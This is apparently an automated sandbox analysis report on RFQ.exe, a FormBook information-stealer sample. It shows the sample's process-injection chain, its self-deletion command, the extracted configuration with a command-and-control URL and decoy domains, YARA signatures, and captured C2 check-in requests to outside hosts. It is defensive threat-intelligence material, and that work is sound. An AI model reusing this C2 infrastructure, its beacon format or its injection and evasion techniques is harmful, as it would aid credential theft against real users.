Analysis Report RFQ.exe

Overview

General Information

Sample Name: RFQ.exe
Analysis ID: 356498
MD5: d0776103a16d59cf8a53d84854377371
SHA1: 11189405de042e38b6d5a7d5ba9250e091d8a0fe
SHA256: 8cbda95915fcb9696e4e221cdb72f9dc9175af27e348f05bede3f988aee9070c
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RFQ.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\RFQ.exe' MD5: D0776103A16D59CF8A53D84854377371)
    • RFQ.exe (PID: 5652 cmdline: {path} MD5: D0776103A16D59CF8A53D84854377371)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 496 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6260 cmdline: /c del 'C:\Users\user\Desktop\RFQ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.talllensphotography.com/md5/"], "decoy": ["gnd3.com", "thedrata.com", "carbeloy.com", "impactpittsburg.com", "sussage.com", "mikespencil.com", "ghoshtechno.com", "partnermassagetherapy.com", "nagago.asia", "parkviee.com", "kichisanpo.com", "awbaviation.com", "shopvibeup.com", "ab-alamode.com", "cash4homesutah.com", "funbrushstrokes.com", "adeleycar.com", "actsbooking.com", "rojorodi.icu", "fleurdelyscantho.com", "bobwhiteknives.com", "entrefloresdr.com", "eurostarcellars.com", "shipu143.com", "lindsaydrees.com", "turningtecc.com", "reusedearth.com", "theemperorbrand.com", "afrohiphops.com", "officehoursonly.com", "pharmacistscbd.com", "yaanpay.com", "mymoxypets.com", "sharehealthalliance.com", "sparktvnetwork.com", "marymoorridgecondo.com", "honest-woman.com", "blitzerfoto.net", "vanhanhnhansu.com", "lawyerspledge.com", "parkwashingtondc.com", "worldwideexpressweb.net", "oatml.com", "acquaintancenutritious.info", "lukmanmalik.xyz", "eudorabcantik.com", "fotosdepueblo.com", "latelierp.com", "dogmomtreats.com", "beerthirtyslc.com", "greenlightsmokables.com", "newyorkbusinesssolutions.com", "latravesia.net", "worldvisioncompany.com", "radiusbrisbane.com", "beachhammocking.com", "games-daizo.com", "customkreation.com", "universiteyehazirlan.com", "studentpalace.rentals", "vizecix.com", "new123movies.pro", "skincolored.com", "goldstespresso.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.RFQ.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.2.RFQ.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.RFQ.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
7.2.RFQ.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.2.RFQ.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: www.talllensphotography.com/md5/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 7.2.RFQ.exe.400000.0.raw.unpack Malware Configuration Extractor: FormBook (the extracted configuration is the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: RFQ.exe Virustotal: Detection: 35%
Source: RFQ.exe ReversingLabs: Detection: 16%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: 7.2.RFQ.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: RFQ.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: RFQ.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.426278317.000000000EF20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000007.00000002.444723171.000000000165F000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.595187979.0000000004610000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RFQ.exe, 00000007.00000002.444723171.000000000165F000.00000040.00000001.sdmp, rundll32.exe
Source: Binary string: rundll32.pdb source: RFQ.exe, 00000007.00000002.444396323.00000000012A9000.00000004.00000020.sdmp
Source: Binary string: rundll32.pdbGCTL source: RFQ.exe, 00000007.00000002.444396323.00000000012A9000.00000004.00000020.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.426278317.000000000EF20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\RFQ.exe Code function: 4x nop then pop edi 7_2_00416C9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop edi 14_2_00656C9C

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 144.208.69.172:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 144.208.69.172:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 144.208.69.172:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 142.250.185.179:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 142.250.185.179:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 142.250.185.179:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.talllensphotography.com/md5/
Source: global traffic HTTP traffic detected: GET /md5/?idBXUjVP=2OYyEXTLFIqjBC5O5m8RJZ0r5htmlVRkTtWUdd8YXANk4Q730sjJcSottHUfDbvwisHPrnhI0g==&EBZ=ZVItdHbxztF0a HTTP/1.1 Host: www.eudorabcantik.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /md5/?idBXUjVP=s4q+K9SYeQAH/ol1LHDCX3FORxxmw3fUJuDZ6OIV0kEaH/C8CzqjXw4/MJNt0fJkrNVLW2mfGw==&EBZ=ZVItdHbxztF0a HTTP/1.1 Host: www.skincolored.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 52.58.78.16 52.58.78.16
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: IMH-WESTUS IMH-WESTUS
Source: global traffic HTTP traffic detected: GET /md5/?idBXUjVP=2OYyEXTLFIqjBC5O5m8RJZ0r5htmlVRkTtWUdd8YXANk4Q730sjJcSottHUfDbvwisHPrnhI0g==&EBZ=ZVItdHbxztF0a HTTP/1.1 Host: www.eudorabcantik.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /md5/?idBXUjVP=s4q+K9SYeQAH/ol1LHDCX3FORxxmw3fUJuDZ6OIV0kEaH/C8CzqjXw4/MJNt0fJkrNVLW2mfGw==&EBZ=ZVItdHbxztF0a HTTP/1.1 Host: www.skincolored.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.eudorabcantik.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 23 Feb 2021 08:02:32 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Transfer-Encoding: chunked Content-Type: text/html Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>3404
Source: RFQ.exe String found in binary or memory: http://code.google.com/feeds/p/topicalmemorysystem/downloads/basic.xml
Source: RFQ.exe String found in binary or memory: http://code.google.com/p/topicalmemorysystem/
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: RFQ.exe String found in binary or memory: http://topicalmemorysystem.googlecode.com/files/
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000008.00000002.593605277.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: RFQ.exe String found in binary or memory: http://www.biblegateway.com/passage/?search=
Source: RFQ.exe String found in binary or memory: http://www.biblija.net/biblija.cgi?m=
Source: RFQ.exe String found in binary or memory: http://www.blueletterbible.org/Bible.cfm?b=
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: RFQ.exe String found in binary or memory: http://www.esvstudybible.org/search?q=
Source: RFQ.exe String found in binary or memory: http://www.esvstudybible.org/search?q=Whttp://www.blueletterbible.org/Bible.cfm?b=
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: RFQ.exe, 00000000.00000002.393740196.0000000001617000.00000004.00000040.sdmp String found in binary or memory: http://www.fontbureau.comas
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: rundll32.exe, 0000000E.00000002.598194730.000000000502F000.00000004.00000001.sdmp String found in binary or memory: http://www.skincolored.com
Source: rundll32.exe, 0000000E.00000002.598194730.000000000502F000.00000004.00000001.sdmp String found in binary or memory: http://www.skincolored.com/
Source: explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: RFQ.exe, 00000000.00000003.334811267.000000000161C000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comn
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: RFQ.exe, 00000000.00000002.404338495.0000000005E50000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.425007365.000000000B1A0000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.444247401.0000000001220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.593192539.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.395391792.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.592662426.0000000000640000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.443676021.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.444182169.00000000011F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.593093257.0000000000840000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\RFQ.exe Code function: 7_2_00419D60 NtCreateFile, 7_2_00419D60
Source: C:\Users\user\Desktop\RFQ.exe Code function: 7_2_00419E10 NtReadFile, 7_2_00419E10
Source: C:\Users\user\Desktop\RFQ.exe Code function: 7_2_00419E90 NtClose, 7_2_00419E90
Source: C:\Users\user\Desktop\RFQ.exe Code function: 7_2_00419F40 NtAllocateVirtualMemory, 7_2_00419F40
Source: C:\Users\user\Desktop\RFQ.exe Code function: 7_2_00419E0B NtReadFile, 7_2_00419E0B
Source: C:\Users\user\Desktop\RFQ.exe Code function: 7_2_00419E8A NtClose, 7_2_00419E8A
Source: C:\Users\user\Desktop\RFQ.exe Code function: 7_2_00419F3A NtAllocateVirtualMemory, 7_2_00419F3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679540 NtReadFile, LdrInitializeThunk, 14_2_04679540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046795D0 NtClose, LdrInitializeThunk, 14_2_046795D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679660 NtAllocateVirtualMemory, LdrInitializeThunk, 14_2_04679660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679650 NtQueryValueKey, LdrInitializeThunk, 14_2_04679650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046796E0 NtFreeVirtualMemory, LdrInitializeThunk, 14_2_046796E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046796D0 NtCreateKey, LdrInitializeThunk, 14_2_046796D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679710 NtQueryInformationToken, LdrInitializeThunk, 14_2_04679710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679FE0 NtCreateMutant, LdrInitializeThunk, 14_2_04679FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679780 NtMapViewOfSection, LdrInitializeThunk, 14_2_04679780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679860 NtQuerySystemInformation, LdrInitializeThunk, 14_2_04679860
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679840 NtDelayExecution, LdrInitializeThunk, 14_2_04679840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679910 NtAdjustPrivilegesToken, LdrInitializeThunk, 14_2_04679910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_046799A0 NtCreateSection, LdrInitializeThunk, 14_2_046799A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679A50 NtCreateFile, LdrInitializeThunk, 14_2_04679A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679560 NtWriteFile, 14_2_04679560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04679520 NtWaitForSingleObject, 14_2_04679520
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0467AD30 NtSetContextThread, 14_2_0467AD30
